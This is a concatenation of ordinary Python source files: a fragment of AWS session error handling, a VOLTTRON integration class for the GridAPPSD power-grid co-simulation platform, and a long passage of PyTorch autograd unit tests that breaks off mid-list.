Common.Session.info_display['UserId'] = w['UserId']
Common.Session.info_display['Account'] = w['Account']
except (exceptions.ClientError, KeyError) as e:
Common.Session.info_display.special_colors['UserId'] = Common.color('error')
Common.Session.info_display.special_colors['Account'] = Common.color('error')
Common.Session.info_display['UserId'] = 'ERROR'
Common.Session.info_display['Account'] = 'ERROR'
Common.Session.ui.log('ERROR: From AWS API: {0}'.format(e))
|
gridappsd_integration.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
try:
from gridappsd import GridAPPSD
from gridappsd.simulation import Simulation
from gridappsd import topics as t
import stomp
HAS_GAPPSD = True
except ImportError:
HAS_GAPPSD = False
RuntimeError('GridAPPSD must be installed before running this script ')
import os
import logging
import gevent
import weakref
from volttron.platform.agent.base_simulation_integration.base_sim_integration import BaseSimIntegration
_log = logging.getLogger(__name__)
__version__ = '1.0'
class GridAPPSDSimIntegration(BaseSimIntegration):
"""
The class is responsible for integration with GridAPPSD co-simulation platform.
It provides integration support to register configuration, start, stop, publish,
receive messages, pause and resume simulation
"""
def __init__(self, config, pubsub):
super(GridAPPSDSimIntegration, self).__init__(config)
self._work_callback = None
self.config = config
self.gridappsd = None
self.sim = None
self.event_callbacks = {}
self.topic_callbacks = {}
self.sim_id = None
def register_inputs(self, config=None, callback=None, **kwargs):
"""
Register configuration parameters with GridAppsD.
The config parameters may include but not limited to:
- power_system_config
- application_config
- simulation_config
- test_config
- service_configs
: Register agent callback method
:return:
"""
self.config = config
self._work_callback = callback
def register_event_callbacks(self, callbacks={}):
"""
Register for event callbacks for event notifications such as
- on measurement change
- on timestep change
- on finish
"""
_log.debug("Registering for event callbacks")
self.event_callbacks = callbacks
def register_topic_callbacks(self, callbacks={}):
"""
Register for any simulation topic callbacks
"""
_log.debug("Registering for topic callbacks")
self.topic_callbacks = callbacks
def start_simulation(self, *args, **kwargs):
"""
Simulation start activities involve:
- Creating GridAppsD connection gevent thread
- Registering for event callbacks (if specified)
- Registering for topic callbacks if specified
- Starting simulation based on the input config
:return:
"""
try:
self.gridappsd = GridAPPSD(override_threading=self.receiver_thread)
_log.debug('Gridappsd connected')
_log.debug(f"connection config is: {self.config}")
self.sim = Simulation(self.gridappsd, self.config)
_log.debug('Gridappsd adding onstart callback')
# Register for onstart callback to know if simulation has started
self.sim.add_onstart_callback(self.sim_on_start)
# Register event callbacks - on measurement, on timestep, on finish
for name, cb in self.event_callbacks.items():
if name == 'MEASUREMENT':
_log.debug('Gridappsd adding measurement callback')
self.sim.add_onmesurement_callback(cb)
elif name == 'TIMESTEP':
_log.debug('Gridappsd adding timestep callback')
self.sim.add_ontimestep_callback(cb)
elif name == 'FINISH':
_log.debug('Gridappsd adding finish callback')
self.sim.add_oncomplete_callback(cb)
# Register/Subscribe for simulation topics
for topic, cb in self.topic_callbacks:
_log.debug('Gridappsd subscribing to topics callback')
self.gridappsd.subscribe(topic, cb)
# Starting GridAppsD simulation
self.sim.start_simulation()
_log.debug(f"Gridappsd simulation id: {self.sim.simulation_id}")
except stomp.exception.NotConnectedException as ex:
_log.error("Unable to connect to GridAPPSD: {}".format(ex))
raise ex
def sim_on_start(self, sim):
"""
Simulation on start callback to get notified when simulation starts
"""
_log.debug(f"GridAppsD simulation id inside sim_on_start(): {sim.simulation_id}")
self.sim_id = sim.simulation_id
def receiver_thread(self, arg):
"""
GridAPPSD connection thread
"""
self._receiver_thread = gevent.threading.Thread(group=None, target=arg)
self._receiver_thread.daemon = True # Don't let thread prevent termination
self._receiver_thread.start()
_log.debug('Gridappsd receiver_thread started!')
return self._receiver_thread
def publish_to_simulation(self, topic, message, **kwargs):
"""
Publish message to GridAppsD
:param topic: GridAppsD publication topic
:param message: message
:return:
"""
self.gridappsd.send(topic, message)
def pause_simulation(self, timeout=None, **kwargs):
"""
Pause the GridAppsD simulation
"""
if timeout is None:
self.sim.pause()
else:
self.sim.pause(timeout)
def resume_simulation(self, *args, **kwargs):
"""
Resume the GridAppsD simulation
"""
self.sim.resume()
def is_sim_installed(self, **kwargs):
"""
Flag to indicate if GridAppsD is installed
"""
return HAS_GAPPSD
def stop_simulation(self, *args, **kwargs):
"""
Stop the simulation if running and disconnect from GridAppsD server
:return:
"""
_log.debug('Stopping the simulation')
try:
if self.sim_id is not None:
self.sim.stop()
_log.debug('Disconnect GridAppsd')
if self.gridappsd is not None:
self.gridappsd.disconnect()
except Exception:
_log.error("Error stop GridAPPSD simulation")
|
test_autograd.py
|
import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing import make_tensor
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
from torch.testing._internal.common_dtype import get_all_dtypes
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
